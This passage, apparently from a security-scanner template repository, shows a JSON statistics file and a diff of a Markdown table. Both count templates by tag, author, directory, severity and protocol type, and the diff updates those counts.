unt":2},{"name":"igs","count":2},{"name":"trixbox","count":2},{"name":"bigip","count":2},{"name":"emerge","count":2},{"name":"smtp","count":2},{"name":"glassfish","count":2},{"name":"prometheus","count":2},{"name":"yapi","count":2},{"name":"icewarp","count":2},{"name":"backdoor","count":2},{"name":"hjtcloud","count":2},{"name":"grav","count":2},{"name":"kentico","count":2},{"name":"voipmonitor","count":2},{"name":"prestashop","count":2},{"name":"idrac","count":2},{"name":"cve2005","count":2},{"name":"sharepoint","count":2},{"name":"xxljob","count":2},{"name":"spark","count":2},{"name":"webcam","count":2},{"name":"activemq","count":2},{"name":"fortios","count":2},{"name":"firebase","count":2},{"name":"huawei","count":2},{"name":"jeedom","count":2},{"name":"globalprotect","count":2},{"name":"injection","count":2},{"name":"rockmongo","count":2},{"name":"netis","count":2},{"name":"waf","count":2},{"name":"oauth","count":2},{"name":"flir","count":2},{"name":"telerik","count":2},{"name":"guacamole","count":2},{"name":"avantfax","count":2},{"name":"wordfence","count":2},{"name":"seeyon","count":2},{"name":"strapi","count":2},{"name":"plesk","count":2},{"name":"pega","count":2},{"name":"sonarqube","count":2},{"name":"odoo","count":2},{"name":"showdoc","count":2},{"name":"github","count":2},{"name":"hoteldruid","count":2},{"name":"smb","count":2},{"name":"cve2007","count":2},{"name":"hashicorp","count":2},{"name":"linkerd","count":2},{"name":"mcafee","count":2},{"name":"mida","count":2},{"name":"jellyfin","count":2},{"name":"mail","count":2},{"name":"kibana","count":2},{"name":"geowebserver","count":2},{"name":"nextjs","count":2},{"name":"discourse","count":1},{"name":"pippoint","count":1},{"name":"cloudflare","count":1},{"name":"bash","count":1},{"name":"zenario","count":1},{"name":"blind","count":1},{"name":"pyramid","count":1},{"name":"webui","count":1},{"name":"tenda","count":1},{"name":"xmlchart","count":1},{"name":"memcached","count":1},{"name":"shopxo","count":1},{"na
me":"panos","count":1},{"name":"codeigniter","count":1},{"name":"rabbitmq","count":1},{"name":"nweb2fax","count":1},{"name":"aruba","count":1},{"name":"openstack","count":1},{"name":"sgp","count":1},{"name":"empirecms","count":1},{"name":"ns","count":1},{"name":"netsweeper","count":1},{"name":"ems","count":1},{"name":"plc","count":1},{"name":"dotnet","count":1},{"name":"expressjs","count":1},{"name":"cacti","count":1},{"name":"centreon","count":1},{"name":"pacsone","count":1},{"name":"mobileiron","count":1},{"name":"pagespeed","count":1},{"name":"landrayoa","count":1},{"name":"eyelock","count":1},{"name":"concrete","count":1},{"name":"proftpd","count":1},{"name":"visualtools","count":1},{"name":"api-manager","count":1},{"name":"clockwatch","count":1},{"name":"websvn","count":1},{"name":"jenzabar","count":1},{"name":"addpac","count":1},{"name":"mysql","count":1},{"name":"gloo","count":1},{"name":"default","count":1},{"name":"stem","count":1},{"name":"wiki","count":1},{"name":"doh","count":1},{"name":"avalanche","count":1},{"name":"asus","count":1},{"name":"skywalking","count":1},{"name":"alertmanager","count":1},{"name":"tika","count":1},{"name":"bolt","count":1},{"name":"cerebro","count":1},{"name":"shopware","count":1},{"name":"opencast","count":1},{"name":"accela","count":1},{"name":"lanproxy","count":1},{"name":"vscode","count":1},{"name":"rmi","count":1},{"name":"acontent","count":1},{"name":"ilo","count":1},{"name":"tpshop","count":1},{"name":"erp-nc","count":1},{"name":"solarlog","count":1},{"name":"discord","count":1},{"name":"vsftpd","count":1},{"name":"sourcebans","count":1},{"name":"floc","count":1},{"name":"74cms","count":1},{"name":"darkstat","count":1},{"name":"geutebruck","count":1},{"name":"livezilla","count":1},{"name":"phpinfo","count":1},{"name":"geddy","count":1},{"name":"cse","count":1},{"name":"mara","count":1},{"name":"influxdb","count":1},{"name":"bedita","count":1},{"name":"fastapi","count":1},{"name":"azkaban","count":1},{"name":"redis","cou
nt":1},{"name":"salesforce","count":1},{"name":"smartblog","count":1},{"name":"yachtcontrol","count":1},{"name":"csod","count":1},{"name":"druid","count":1},{"name":"javamelody","count":1},{"name":"krweb","count":1},{"name":"totaljs","count":1},{"name":"hortonworks","count":1},{"name":"scimono","count":1},{"name":"cocoon","count":1},{"name":"bitly","count":1},{"name":"fortiweb","count":1},{"name":"expn","count":1},{"name":"javascript","count":1},{"name":"tectuus","count":1},{"name":"selea","count":1},{"name":"fortinet","count":1},{"name":"rujjie","count":1},{"name":"commax","count":1},{"name":"spf","count":1},{"name":"yealink","count":1},{"name":"lotuscms","count":1},{"name":"owasp","count":1},{"name":"node-red-dashboard","count":1},{"name":"primetek","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"phpunit","count":1},{"name":"bazarr","count":1},{"name":"mpsec","count":1},{"name":"miscrsoft","count":1},{"name":"zarafa","count":1},{"name":"adminer","count":1},{"name":"openerp","count":1},{"name":"linux","count":1},{"name":"biometrics","count":1},{"name":"emby","count":1},{"name":"xiuno","count":1},{"name":"lg-nas","count":1},{"name":"xunchi","count":1},{"name":"mongoshake","count":1},{"name":"couchbase","count":1},{"name":"ec2","count":1},{"name":"iceflow","count":1},{"name":"froxlor","count":1},{"name":"cherokee","count":1},{"name":"ulterius","count":1},{"name":"realteo","count":1},{"name":"wazuh","count":1},{"name":"redhat","count":1},{"name":"npm","count":1},{"name":"tracer","count":1},{"name":"setup","count":1},{"name":"webadmin","count":1},{"name":"keenetic","count":1},{"name":"adb","count":1},{"name":"manageengine","count":1},{"name":"embedthis","count":1},{"name":"cgi","count":1},{"name":"tjws","count":1},{"name":"postgres","count":1},{"name":"labtech","count":1},{"name":"majordomo2","count":1},{"name":"spectracom","count":1},{"name":"clave","count":1},{"name":"xff","count":1},{"name":"sophos","count":1},{"name":"st","count":1},{"
name":"smartsense","count":1},{"name":"monitorix","count":1},{"name":"interlib","count":1},{"name":"springframework","count":1},{"name":"faraday","count":1},{"name":"grails","count":1},{"name":"dvr","count":1},{"name":"fortilogger","count":1},{"name":"sidekiq","count":1},{"name":"cors","count":1},{"name":"finereport","count":1},{"name":"jsp","count":1},{"name":"aspnuke","count":1},{"name":"ioncube","count":1},{"name":"tongda","count":1},{"name":"iptime","count":1},{"name":"vnc","count":1},{"name":"circontrol","count":1},{"name":"flash","count":1},{"name":"xvr","count":1},{"name":"openemr","count":1},{"name":"owa","count":1},{"name":"zcms","count":1},{"name":"turbocrm","count":1},{"name":"jitsi","count":1},{"name":"jquery","count":1},{"name":"axis","count":1},{"name":"wing-ftp","count":1},{"name":"argussurveillance","count":1},{"name":"bullwark","count":1},{"name":"maccmsv10","count":1},{"name":"tensorflow","count":1},{"name":"perl","count":1},{"name":"ruckus","count":1},{"name":"ganglia","count":1},{"name":"bruteforce","count":1},{"name":"subrion","count":1},{"name":"svn","count":1},{"name":"rfi","count":1},{"name":"upnp","count":1},{"name":"sentry","count":1},{"name":"magicflow","count":1},{"name":"szhe","count":1},{"name":"wavemaker","count":1},{"name":"h3c-imc","count":1},{"name":"rubedo","count":1},{"name":"sarg","count":1},{"name":"appweb","count":1},{"name":"gateone","count":1},{"name":"thinkadmin","count":1},{"name":"wmt","count":1},{"name":"plastic","count":1},{"name":"fortigate","count":1},{"name":"chinaunicom","count":1},{"name":"nette","count":1},{"name":"rsyncd","count":1},{"name":"socomec","count":1},{"name":"gridx","count":1},{"name":"saltapi","count":1},{"name":"db","count":1},{"name":"zend","count":1},{"name":"nsasg","count":1},{"name":"wuzhicms","count":1},{"name":"spip","count":1},{"name":"jfrog","count":1},{"name":"goahead","count":1},{"name":"netdata","count":1},{"name":"eprints","count":1},{"name":"calendarix","count":1},{"name":"tamronos","coun
t":1},{"name":"sprintful","count":1},{"name":"tieline","count":1},{"name":"k8s","count":1},{"name":"sage","count":1},{"name":"lancom","count":1},{"name":"monitorr","count":1},{"name":"kerbynet","count":1},{"name":"octobercms","count":1},{"name":"netrc","count":1},{"name":"sitecore","count":1},{"name":"qcubed","count":1},{"name":"cloudinary","count":1},{"name":"trane","count":1},{"name":"kafdrop","count":1},{"name":"yii","count":1},{"name":"traefik","count":1},{"name":"exponentcms","count":1},{"name":"jeewms","count":1},{"name":"blue-ocean","count":1},{"name":"wondercms","count":1},{"name":"emc","count":1},{"name":"kong","count":1},{"name":"spidercontrol","count":1},{"name":"seacms","count":1},{"name":"apos","count":1},{"name":"acexy","count":1},{"name":"cofax","count":1},{"name":"klog","count":1},{"name":"dotnetnuke","count":1},{"name":"wamp","count":1},{"name":"varnish","count":1},{"name":"timesheet","count":1},{"name":"kyan","count":1},{"name":"gotmls","count":1},{"name":"wavlink","count":1},{"name":"clusterengine","count":1},{"name":"synnefo","count":1},{"name":"oscommerce","count":1},{"name":"woocomernce","count":1},{"name":"servicedesk","count":1},{"name":"jnoj","count":1},{"name":"visionhub","count":1},{"name":"anchorcms","count":1},{"name":"zyxel","count":1},{"name":" 
default-login","count":1},{"name":"powercreator","count":1},{"name":"pcoip","count":1},{"name":"cve2006","count":1},{"name":"resourcespace","count":1},{"name":"solman","count":1},{"name":"ntopng","count":1},{"name":"spring","count":1},{"name":"timeclock","count":1},{"name":"dbeaver","count":1},{"name":"favicon","count":1},{"name":"portainer","count":1},{"name":"sceditor","count":1},{"name":"ewebs","count":1},{"name":"ricoh","count":1},{"name":"panabit","count":1},{"name":"exposures","count":1},{"name":"octoprint","count":1},{"name":"hiboss","count":1},{"name":"swagger","count":1},{"name":"sco","count":1},{"name":"fiori","count":1},{"name":"plugin","count":1},{"name":"tapestry","count":1},{"name":"ssltls","count":1},{"name":"k8","count":1},{"name":"ecom","count":1},{"name":"viewpoint","count":1},{"name":"htmli","count":1},{"name":"office365","count":1},{"name":"phalcon","count":1},{"name":"zeroshell","count":1},{"name":"svnserve","count":1},{"name":"crm","count":1},{"name":"camera","count":1},{"name":"redwood","count":1},{"name":"rdp","count":1},{"name":"getsimple","count":1},{"name":"alibaba","count":1},{"name":"sureline","count":1},{"name":"vsphere","count":1},{"name":"acme","count":1},{"name":"twitter-server","count":1},{"name":"uwsgi","count":1},{"name":"parentlink","count":1},{"name":"simplecrm","count":1},{"name":"expose","count":1},{"name":"mailchimp","count":1},{"name":"xml","count":1},{"name":"netgenie","count":1},{"name":"extractor","count":1},{"name":"mediumish","count":1},{"name":"landray","count":1},{"name":"viewlinc","count":1},{"name":"bookstack","count":1},{"name":"checkpoint","count":1},{"name":"servicenow","count":1},{"name":"enum","count":1},{"name":"weiphp","count":1},{"name":"rmc","count":1},{"name":"wifisky","count":1},{"name":"ruby","count":1},{"name":"kubeflow","count":1},{"name":"enumeration","count":1},{"name":"avtech","count":1},{"name":"zookeeper","count":1},{"name":"opm","count":1},{"name":"nomad","count":1},{"name":"fastcgi","count":1},{
"name":"dvwa","count":1},{"name":"nedi","count":1},{"name":"tileserver","count":1},{"name":"nc2","count":1},{"name":"lansweeper","count":1},{"name":"razor","count":1},{"name":"nordex","count":1},{"name":"nuuo","count":1},{"name":"mongo","count":1},{"name":"mdb","count":1},{"name":"2014","count":1},{"name":"lutron","count":1},{"name":"harbor","count":1},{"name":"etouch","count":1},{"name":"zm","count":1},{"name":"diris","count":1},{"name":"zmanda","count":1},{"name":"announcekit","count":1},{"name":"mirai","count":1},{"name":"mautic","count":1},{"name":"aura","count":1},{"name":"rhymix","count":1},{"name":"logontracer","count":1},{"name":"pgadmin","count":1},{"name":"glances","count":1},{"name":"sar2html","count":1},{"name":"commscope","count":1},{"name":"linksys","count":1},{"name":"zte","count":1},{"name":"email","count":1},{"name":"opensmtpd","count":1},{"name":"jenkin","count":1},{"name":"mantisbt","count":1},{"name":"fortigates","count":1},{"name":"ueditor","count":1},{"name":"blackboard","count":1},{"name":"dotclear","count":1},{"name":"codemeter","count":1},{"name":"javafaces","count":1},{"name":"mantis","count":1},{"name":"heroku","count":1},{"name":"nps","count":1},{"name":"sqlite","count":1},{"name":"webmin","count":1},{"name":"apiman","count":1},{"name":"scs","count":1},{"name":"trilithic","count":1},{"name":"wildfly","count":1},{"name":"plone","count":1},{"name":"ssl","count":1},{"name":"qvisdvr","count":1},{"name":"phpfusion","count":1},{"name":"fuelcms","count":1},{"name":"hadoop","count":1},{"name":"smi","count":1},{"name":"circontrorl","count":1},{"name":"myucms","count":1},{"name":"metinfo","count":1},{"name":"drone","count":1},{"name":"zzzcms","count":1},{"name":"dom","count":1},{"name":"webmodule-ee","count":1},{"name":"soar","count":1},{"name":"esmtp","count":1},{"name":"arl","count":1},{"name":"jmx","count":1},{"name":"nuxeo","count":1},{"name":"dnssec","count":1},{"name":"ghost","count":1},{"name":"payara","count":1},{"name":"episerver","count":
1},{"name":"b2evolution","count":1},{"name":"linkedin","count":1},{"name":"idemia","count":1},{"name":"mariadb","count":1},{"name":"node","count":1},{"name":"haproxy","count":1},{"name":"qsan","count":1},{"name":"dompdf","count":1},{"name":"centos","count":1},{"name":"flink","count":1},{"name":"feifeicms","count":1},{"name":"postmessage","count":1},{"name":"upload","count":1},{"name":"gitlist","count":1},{"name":"opensns","count":1},{"name":"liferay","count":1},{"name":"nexusdb","count":1},{"name":"opentsdb","count":1},{"name":"triconsole","count":1},{"name":"ilo4","count":1},{"name":"huijietong","count":1},{"name":"wooyun","count":1},{"name":"gogs","count":1},{"name":"beanshell","count":1},{"name":"auth","count":1},{"name":"openrestry","count":1},{"name":"duomicms","count":1},{"name":"gespage","count":1},{"name":"chevereto","count":1},{"name":"comodo","count":1},{"name":"optiLink","count":1},{"name":"redcap","count":1},{"name":"exacqvision","count":1},{"name":"oneblog","count":1},{"name":"openx","count":1},{"name":"webftp","count":1},{"name":"qdpm","count":1},{"name":"bigbluebutton","count":1},{"name":"tensorboard","count":1},{"name":"alerta","count":1},{"name":"clink-office","count":1},{"name":"xdcms","count":1},{"name":"ambari","count":1},{"name":"moinmoin","count":1},{"name":"phpfastcache","count":1},{"name":"eyou","count":1},{"name":"csrf","count":1},{"name":"pulsesecure","count":1},{"name":"camunda","count":1},{"name":"achecker","count":1},{"name":"starttls","count":1},{"name":"cobub","count":1},{"name":"domxss","count":1},{"name":"lighttpd","count":1},{"name":"sangfor","count":1},{"name":"robomongo","count":1},{"name":"moin","count":1}],"authors":[{"name":"dhiyaneshdk","count":245},{"name":"pikpikcu","count":244},{"name":"pdteam","count":198},{"name":"daffainfo","count":164},{"name":"geeknik","count":149},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":54},{"name":"pussycat0x","coun
t":44},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":9},{"name":"nadino","count":9},{"name":"wdahlenb","count":9},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"rootxharsh","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"iamnoooob","count":5},{"name":"pentest_swissky","count":5},{"name":"meme-lord","count":5},{"name":"ganofins","count":5},{"name":"e_schultze_","count":4},{"name":"dogasantos","count":4},{"name":"elsfa7110","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"f1tz","count":3},{"name":"yash anand 
@yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"z3bd","count":3},{"name":"vsh00t","count":3},{"name":"fyoorer","count":3},{"name":"logicalhunter","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"incogbyte","count":3},{"name":"mavericknerd","count":3},{"name":"tess","count":3},{"name":"_generic_human_","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"name":"impramodsargar","count":3},{"name":"jarijaas","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"gevakun","count":2},{"name":"afaq","count":2},{"name":"0xcrypto","count":2},{"name":"0xsapra","count":2},{"name":"moritz nentwig","count":2},{"name":"0xelkomy","count":2},{"name":"mohammedsaneem","count":2},{"name":"unstabl3","count":2},{"name":"alifathi-h1","count":2},{"name":"dheerajmadhukar","count":2},{"name":"w4cky_","count":2},{"name":"udit_thakkur","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"lu4nx","count":2},{"name":"koti2","count":2},{"name":"sushantkamble","count":2},{"name":"ehsahil","count":2},{"name":"randomrobbie","count":2},{"name":"x1m_martijn","count":2},{"name":"ree4pwn","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"whoever","count":2},{"name":"gal 
nagli","count":2},{"name":"0xprial","count":2},{"name":"bing0o","count":2},{"name":"0xrudra","count":2},{"name":"bp0lr","count":2},{"name":"fabaff","count":2},{"name":"parth","count":2},{"name":"random-robbie","count":2},{"name":"arcc","count":2},{"name":"amsda","count":2},{"name":"bsysop","count":2},{"name":"foulenzer","count":2},{"name":"vavkamil","count":2},{"name":"joeldeleep","count":2},{"name":"kiblyn11","count":2},{"name":"hahwul","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"lotusdll","count":2},{"name":"nkxxkn","count":2},{"name":"furkansenan","count":1},{"name":"omarkurt","count":1},{"name":"pudsec","count":1},{"name":"petruknisme","count":1},{"name":"pratik khalane","count":1},{"name":"regala_","count":1},{"name":"alex","count":1},{"name":"sicksec","count":1},{"name":"knassar702","count":1},{"name":"naglinagli","count":1},{"name":"aresx","count":1},{"name":"0xteles","count":1},{"name":"blckraven","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ringo","count":1},{"name":"mubassirpatel","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"hanlaomo","count":1},{"name":"abison_binoy","count":1},{"name":"r3naissance","count":1},{"name":"becivells","count":1},{"name":"makyotox","count":1},{"name":"kurohost","count":1},{"name":"th3.d1p4k","count":1},{"name":"sec_hawk","count":1},{"name":"whynotke","count":1},{"name":"jeya seelan","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"nytr0gen","count":1},{"name":"undefl0w","count":1},{"name":"intx0x80","count":1},{"name":"rodnt","count":1},{"name":"noamrathaus","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"kareemse1im","count":1},{"name":"affix","count":1},{"name":"geraldino2","count":1},{"name":"absshax","count":1},{"name":"daviey","count":1},{"name":"berkdusunur","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"ivo palazzolo 
(@palaziv)","count":1},{"name":"jteles","count":1},{"name":"b0yd","count":1},{"name":"gboddin","count":1},{"name":"mah3sec_","count":1},{"name":"rojanrijal","count":1},{"name":"luskabol","count":1},{"name":"mhdsamx","count":1},{"name":"fmunozs","count":1},{"name":"elder tao","count":1},{"name":"flag007","count":1},{"name":"bad5ect0r","count":1},{"name":"mass0ma","count":1},{"name":"alph4byt3","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"dawid czarnecki","count":1},{"name":"bjhulst","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ahmed sherif","count":1},{"name":"cookiehanhoan","count":1},{"name":"infosecsanyam","count":1},{"name":"kabirsuda","count":1},{"name":"streetofhackerr007","count":1},{"name":"soyelmago","count":1},{"name":"luci","count":1},{"name":"akshansh","count":1},{"name":"_harleo","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"ooooooo_q","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"rtcms","count":1},{"name":"taielab","count":1},{"name":"udyz","count":1},{"name":"shreyapohekar","count":1},{"name":"fopina","count":1},{"name":"b4uh0lz","count":1},{"name":"iampritam","count":1},{"name":"sshell","count":1},{"name":"0xtavian","count":1},{"name":"@dwisiswant0","count":1},{"name":"elmahdi","count":1},{"name":"patralos","count":1},{"name":"huowuzhao","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thevillagehacker","count":1},{"name":"sickwell","count":1},{"name":"adrianmf","count":1},{"name":"un-fmunozs","count":1},{"name":"philippdelteil","count":1},{"name":"wabafet","count":1},{"name":"yashgoti","count":1},{"name":"borna 
nematzadeh","count":1},{"name":"sullo","count":1},{"name":"pdp","count":1},{"name":"shelld3v","count":1},{"name":"divya_mudgal","count":1},{"name":"_c0wb0y_","count":1},{"name":"52971","count":1},{"name":"_darrenmartyn","count":1},{"name":"andirrahmani1","count":1},{"name":"smaranchand","count":1},{"name":"ilovebinbash","count":1},{"name":"johnjhacking","count":1},{"name":"manuelbua","count":1},{"name":"g4l1t0","count":1},{"name":"alperenkesk","count":1},{"name":"zhenwarx","count":1},{"name":"c3l3si4n","count":1},{"name":"co0nan","count":1},{"name":"revblock","count":1},{"name":"andysvints","count":1},{"name":"idealphase","count":1},{"name":"deena","count":1},{"name":"me9187","count":1},{"name":"0xrod","count":1},{"name":"mesaglio","count":1},{"name":"remonsec","count":1},{"name":"vzamanillo","count":1},{"name":"raesene","count":1},{"name":"j33n1k4","count":1},{"name":"0ut0fb4nd","count":1},{"name":"tirtha_mandal","count":1},{"name":"toufik airane","count":1},{"name":"qlkwej","count":1},{"name":"juicypotato1","count":1},{"name":"exploitation","count":1},{"name":"chron0x","count":1},{"name":"zandros0","count":1},{"name":"its0x08","count":1},{"name":"convisoappsec","count":1},{"name":"johnk3r","count":1},{"name":"schniggie","count":1},{"name":"evolutionsec","count":1},{"name":"0h1in9e","count":1},{"name":"s1r1u5_","count":1},{"name":"d0rkerdevil","count":1},{"name":"bolli95","count":1},{"name":"bernardofsr","count":1},{"name":"manikanta a.k.a 
@secureitmania","count":1},{"name":"ipanda","count":1},{"name":"yashanand155","count":1},{"name":"tim_koopmans","count":1},{"name":"sy3omda","count":1},{"name":"akash.c","count":1},{"name":"notsoevilweasel","count":1},{"name":"thezakman","count":1},{"name":"retr0","count":1},{"name":"willd96","count":1},{"name":"ldionmarcil","count":1},{"name":"micha3lb3n","count":1},{"name":"defr0ggy","count":1},{"name":"ohlinge","count":1},{"name":"apt-mirror","count":1},{"name":"shifacyclewla","count":1},{"name":"ajaysenr","count":1},{"name":"hakluke","count":1},{"name":"yavolo","count":1}],"directory":[{"name":"cves","count":640},{"name":"vulnerabilities","count":283},{"name":"exposed-panels","count":231},{"name":"exposures","count":184},{"name":"technologies","count":163},{"name":"misconfiguration","count":125},{"name":"takeovers","count":71},{"name":"default-logins","count":51},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":29},{"name":"miscellaneous","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":603},{"name":"high","count":510},{"name":"medium","count":402},{"name":"critical","count":232},{"name":"low","count":160}],"types":[{"name":"http","count":1807},{"name":"file","count":46},{"name":"network","count":38},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index ca0925968b..36506e5b4e 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md 
@@ -1,732 +1,736 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 | -| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 | -| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 | -| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 | -| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | | -| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | | -| rce | 189 | gy741 | 71 | takeovers | 71 | | | | | +| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 | +| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 | +| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 | +| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 | +| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | | +| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | +| rce | 189 | gy741 | 72 | takeovers | 71 | | | | | | cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | -| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | -| tech | 103 | pussycat0x | 42 | workflows | 35 | | | | | -| cve2021 | 103 | gaurang | 42 | network | 29 | | | | | +| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | | +| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | | +| cve2021 | 104 | gaurang | 42 | network | 29 | | | | | | config | 93 | ice3man | 26 | miscellaneous | 27 | | | | | -| cve2019 | 88 | organiccrap | 24 | iot | 23 | | | | | -| cve2018 | 78 | 0x_akoko | 23 | dns | 11 | | | | | -| takeover | 74 | philippedelteil | 19 | fuzzing | 9 | | | | | -| | 65 | sheikhrishad | 15 | cnvd | 9 | | | | | -| 
token | 64 | milo2012 | 14 | headless | 5 | | | | | -| apache | 64 | techbrunchfr | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 57 | pr3r00t | 13 | | | | | | | -| iot | 54 | suman_kar | 12 | | | | | | | -| cve2017 | 48 | r3dg33k | 11 | | | | | | | -| file | 46 | cyllective | 11 | | | | | | | -| oob | 45 | righettod | 10 | | | | | | | -| unauth | 42 | random_robbie | 10 | | | | | | | -| network | 38 | hackergautam | 9 | | | | | | | -| joomla | 36 | nadino | 9 | | | | | | | -| sqli | 36 | wdahlenb | 9 | | | | | | | -| ssrf | 32 | melbadry9 | 9 | | | | | | | -| cve2016 | 32 | aashiq | 8 | | | | | | | -| oracle | 30 | that_juan_ | 8 | | | | | | | -| logs | 30 | iamthefrogy | 8 | | | | | | | -| workflow | 30 | harshbothra_ | 7 | | | | | | | -| cve2010 | 28 | 0x240x23elu | 7 | | | | | | | -| misc | 27 | dr_set | 7 | | | | | | | -| atlassian | 27 | oppsec | 7 | | | | | | | +| cve2019 | 90 | organiccrap | 24 | iot | 23 | | | | | +| cve2018 | 79 | 0x_akoko | 23 | dns | 11 | | | | | +| takeover | 74 | philippedelteil | 19 | cnvd | 9 | | | | | +| | 66 | sheikhrishad | 15 | fuzzing | 9 | | | | | +| apache | 64 | milo2012 | 14 | headless | 5 | | | | | +| token | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 57 | techbrunchfr | 13 | | | | | | | +| iot | 56 | suman_kar | 12 | | | | | | | +| cve2017 | 48 | cyllective | 11 | | | | | | | +| file | 46 | r3dg33k | 11 | | | | | | | +| oob | 45 | random_robbie | 10 | | | | | | | +| unauth | 45 | righettod | 10 | | | | | | | +| joomla | 40 | hackergautam | 9 | | | | | | | +| network | 38 | wdahlenb | 9 | | | | | | | +| sqli | 37 | melbadry9 | 9 | | | | | | | +| ssrf | 32 | nadino | 9 | | | | | | | +| cve2010 | 32 | iamthefrogy | 8 | | | | | | | +| cve2016 | 32 | that_juan_ | 8 | | | | | | | +| workflow | 30 | aashiq | 8 | | | | | | | +| logs | 30 | emadshanab | 7 | | | | | | | +| oracle | 30 | dr_set | 7 | | | | | | | | jira | 27 | techryptic (@tech) | 7 | | | | | | | -| redirect | 25 | 
kophjager007 | 7 | | | | | | | +| misc | 27 | kophjager007 | 7 | | | | | | | +| atlassian | 27 | harshbothra_ | 7 | | | | | | | +| redirect | 25 | 0x240x23elu | 7 | | | | | | | | listing | 25 | randomstr1ng | 7 | | | | | | | -| generic | 22 | emadshanab | 7 | | | | | | | -| cisco | 19 | puzzlepeaches | 6 | | | | | | | -| aem | 19 | __fazal | 6 | | | | | | | -| disclosure | 18 | caspergn | 6 | | | | | | | -| sap | 18 | panch0r3d | 5 | | | | | | | -| cve2015 | 18 | yanyun | 5 | | | | | | | -| router | 17 | pentest_swissky | 5 | | | | | | | -| auth-bypass | 16 | rootxharsh | 5 | | | | | | | -| springboot | 16 | meme-lord | 5 | | | | | | | -| cve2014 | 15 | ganofins | 5 | | | | | | | -| debug | 14 | joanbono | 5 | | | | | | | -| cve2012 | 14 | iamnoooob | 5 | | | | | | | -| fuzz | 13 | elsfa7110 | 4 | | | | | | | -| misconfig | 13 | e_schultze_ | 4 | | | | | | | -| android | 13 | nodauf | 4 | | | | | | | -| struts | 13 | xelkomy | 4 | | | | | | | -| cve2011 | 13 | github.com/its0x08 | 4 | | | | | | | -| weblogic | 12 | yash anand @yashanand155 | 3 | | | | | | | -| dlink | 12 | binaryfigments | 3 | | | | | | | -| adobe | 12 | jarijaas | 3 | | | | | | | -| jenkins | 12 | emenalf | 3 | | | | | | | -| dns | 12 | z3bd | 3 | | | | | | | -| devops | 11 | dudez | 3 | | | | | | | +| generic | 22 | oppsec | 7 | | | | | | | +| aem | 19 | puzzlepeaches | 6 | | | | | | | +| cisco | 19 | caspergn | 6 | | | | | | | +| cve2015 | 18 | __fazal | 6 | | | | | | | +| disclosure | 18 | joanbono | 5 | | | | | | | +| sap | 18 | 